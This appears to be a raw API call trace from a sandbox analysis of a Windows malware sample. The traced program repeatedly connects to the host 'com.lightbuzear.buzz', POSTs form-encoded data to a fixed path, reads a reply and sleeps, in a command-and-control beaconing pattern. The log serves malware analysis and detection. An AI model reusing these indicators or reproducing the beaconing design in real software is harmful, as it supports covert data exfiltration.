[0180.076] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6d0 [0180.076] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0180.076] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce730 [0180.076] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0180.076] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce740 [0180.076] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0180.077] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47f0a58 [0180.077] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0180.077] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47f0bc0 [0180.077] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0a58 | out: hHeap=0x4780000) returned 1 [0180.077] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0180.077] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0bc0 | out: hHeap=0x4780000) returned 1 [0180.077] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x47f0ba8 [0180.077] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f448 [0180.077] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f448 | out: hHeap=0x4780000) returned 1 [0180.077] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0180.077] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="Kolpt523ytcserstrew/torel", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x800000, dwContext=0x0) returned 0xcc000c [0180.078] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce710 [0180.078] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6a0 [0180.078] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0180.078] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce570 [0180.078] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0180.078] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce620 [0180.078] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0180.078] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce740 [0180.078] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0180.078] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47f0b48 [0180.078] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0180.078] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47f0b18 [0180.078] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0b48 | out: hHeap=0x4780000) returned 1 [0180.078] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0180.078] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0b18 | out: hHeap=0x4780000) returned 1 [0180.078] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x481f290 [0180.079] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0180.079] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbe80 [0180.079] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f290 | out: hHeap=0x4780000) returned 1 [0180.079] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f100 [0180.079] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbf28 [0180.079] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f128 [0180.079] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbf28 | out: hHeap=0x4780000) returned 1 [0180.079] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe80 | out: hHeap=0x4780000) returned 1 [0180.079] GetProcAddress (hModule=0x71570000, lpProcName="InternetSetOptionA") returned 0x71611dc0 [0180.080] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0xde1c8*, dwBufferLength=0x4) returned 1 [0180.080] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f128 | out: hHeap=0x4780000) returned 1 [0180.080] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce670 [0180.080] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6f0 [0180.080] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0180.080] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce710 [0180.080] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6f0 | out: hHeap=0x4780000) returned 1 [0180.080] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce730 [0180.080] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0180.080] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce740 [0180.080] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0180.080] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47f0b18 [0180.080] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0180.080] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47f0b60 [0180.080] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0b18 | out: hHeap=0x4780000) returned 1 [0180.080] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0180.080] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0b60 | out: hHeap=0x4780000) returned 1 [0180.080] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x481f498 [0180.080] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0180.081] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0180.081] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f498 | out: hHeap=0x4780000) returned 1 [0180.081] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f290 [0180.081] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbcf8 [0180.081] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f240 [0180.081] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0180.081] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0180.082] GetProcAddress (hModule=0x71570000, lpProcName="HttpSendRequestA") returned 0x71638e60 [0180.082] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type:application/x-www-form-urlencoded", dwHeadersLength=0x2e, lpOptional=0x47a6f78*, dwOptionalLength=0x4b2) returned 1 [0181.939] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f240 | out: hHeap=0x4780000) returned 1 [0181.939] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce730 [0181.939] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6d0 [0181.939] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0181.940] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce690 [0181.940] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5a0 [0181.940] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0181.940] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce710 [0181.940] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0181.940] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce670 [0181.940] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0181.940] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce600 [0181.940] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0181.940] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47f0b30 [0181.940] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0181.940] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47f0b60 [0181.940] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0b30 | out: hHeap=0x4780000) returned 1 [0181.940] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0181.940] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0b60 | out: hHeap=0x4780000) returned 1 [0181.940] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x481f240 [0181.940] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0181.940] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fb8d0 [0181.940] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f240 | out: hHeap=0x4780000) returned 1 [0181.940] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f1a0 [0181.940] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbc50 [0181.940] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f240 [0181.941] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0181.941] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb8d0 | out: hHeap=0x4780000) returned 1 [0181.941] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0181.941] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x5) returned 1 [0181.941] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f240 | out: hHeap=0x4780000) returned 1 [0181.942] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0181.942] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce690 [0181.942] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6b0 [0181.942] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0181.942] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce740 [0181.942] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0181.942] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce670 [0181.942] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0181.942] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce710 [0181.942] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0181.942] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47f0b90 [0181.942] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0181.942] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47f0b30 [0181.942] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0b90 | out: hHeap=0x4780000) returned 1 [0181.942] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0181.943] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0b30 | out: hHeap=0x4780000) returned 1 [0181.943] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x481f448 [0181.943] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0181.943] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0181.943] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f448 | out: hHeap=0x4780000) returned 1 [0181.943] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f240 [0181.943] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbcf8 [0181.943] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f498 [0181.943] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0181.944] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0181.944] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0181.944] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x0) returned 1 [0181.944] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f498 | out: hHeap=0x4780000) returned 1 [0181.944] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0181.945] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0181.945] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0181.945] FreeLibrary (hLibModule=0x71570000) returned 1 [0181.945] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0181.945] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0181.945] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f0d8 | out: hHeap=0x4780000) returned 1 [0181.945] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f0b0 | out: hHeap=0x4780000) returned 1 [0181.945] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f470 | out: hHeap=0x4780000) returned 1 [0181.946] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f5b0 | out: hHeap=0x4780000) returned 1 [0181.946] Sleep (dwMilliseconds=0x2710) [0181.969] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6b0 [0181.969] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6a0 [0181.969] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0181.969] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6d0 [0181.969] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0181.969] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5a0 [0181.969] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0181.969] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce680 [0181.969] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0181.969] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47f0848 [0181.969] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0181.970] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47f09e0 [0181.970] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0848 | out: hHeap=0x4780000) returned 1 [0181.970] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0181.970] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f09e0 | out: hHeap=0x4780000) returned 1 [0181.970] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x47f09e0 [0181.970] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f5b0 [0181.970] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f5b0 | out: hHeap=0x4780000) returned 1 [0181.970] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0181.970] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f5b0 [0181.970] LoadLibraryW (lpLibFileName="Urlmon.dll") returned 0x71780000 [0181.971] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce610 [0181.971] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6f0 [0181.971] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0181.971] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce600 [0181.971] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6f0 | out: hHeap=0x4780000) returned 1 [0181.971] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce670 [0181.971] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0181.971] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6f0 [0181.971] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0181.971] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47f0848 [0181.971] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6f0 | out: hHeap=0x4780000) returned 1 [0181.971] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47f0bd8 [0181.971] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0848 | out: hHeap=0x4780000) returned 1 [0181.971] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0181.971] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0bd8 | out: hHeap=0x4780000) returned 1 [0181.971] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x481f358 [0181.971] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0181.971] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fb978 [0181.971] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f358 | out: hHeap=0x4780000) returned 1 [0181.971] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f448 [0181.971] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbc50 [0181.971] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f498 [0181.972] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0181.972] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb978 | out: hHeap=0x4780000) returned 1 [0181.972] GetProcAddress (hModule=0x71780000, lpProcName="ObtainUserAgentString") returned 0x71852f30 [0181.972] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xdf2f4, cbSize=0xde1cc | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0xde1cc) returned 0x0 [0181.972] FreeLibrary (hLibModule=0x71780000) returned 1 [0181.973] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f498 | out: hHeap=0x4780000) returned 1 [0181.973] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0181.973] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f470 [0181.973] InternetConnectA (hInternet=0xcc0004, lpszServerName="com.lightbuzear.buzz", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0181.974] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce620 [0181.974] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6b0 [0181.974] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0181.974] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce570 [0181.974] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0181.974] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce730 [0181.974] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0181.974] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6f0 [0181.974] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0181.974] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47f0bc0 [0181.974] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6f0 | out: hHeap=0x4780000) returned 1 [0181.974] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47f0bd8 [0181.974] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0bc0 | out: hHeap=0x4780000) returned 1 [0181.974] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0181.974] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0bd8 | out: hHeap=0x4780000) returned 1 [0181.974] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x47f0bd8 [0181.974] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f3a8 [0181.975] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f3a8 | out: hHeap=0x4780000) returned 1 [0181.975] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0181.975] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f178 [0181.975] LoadLibraryW (lpLibFileName="Wininet.dll") returned 0x71570000 [0181.975] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f128 [0181.975] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce690 [0181.975] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce600 [0181.975] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0181.975] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce630 [0181.975] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0181.975] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce610 [0181.975] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0181.975] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5f0 [0181.976] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0181.976] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47f0b60 [0181.976] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5f0 | out: hHeap=0x4780000) returned 1 [0181.976] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47f0b30 [0181.976] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0b60 | out: hHeap=0x4780000) returned 1 [0181.976] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0181.976] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0b30 | out: hHeap=0x4780000) returned 1 [0181.976] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x47f0b60 [0181.976] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f330 [0181.976] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f330 | out: hHeap=0x4780000) returned 1 [0181.976] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0181.976] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="Kolpt523ytcserstrew/torel", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x800000, dwContext=0x0) returned 0xcc000c [0181.976] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce740 [0181.976] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce630 [0181.977] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0181.977] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5e0 [0181.977] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0181.977] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce680 [0181.977] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0181.977] 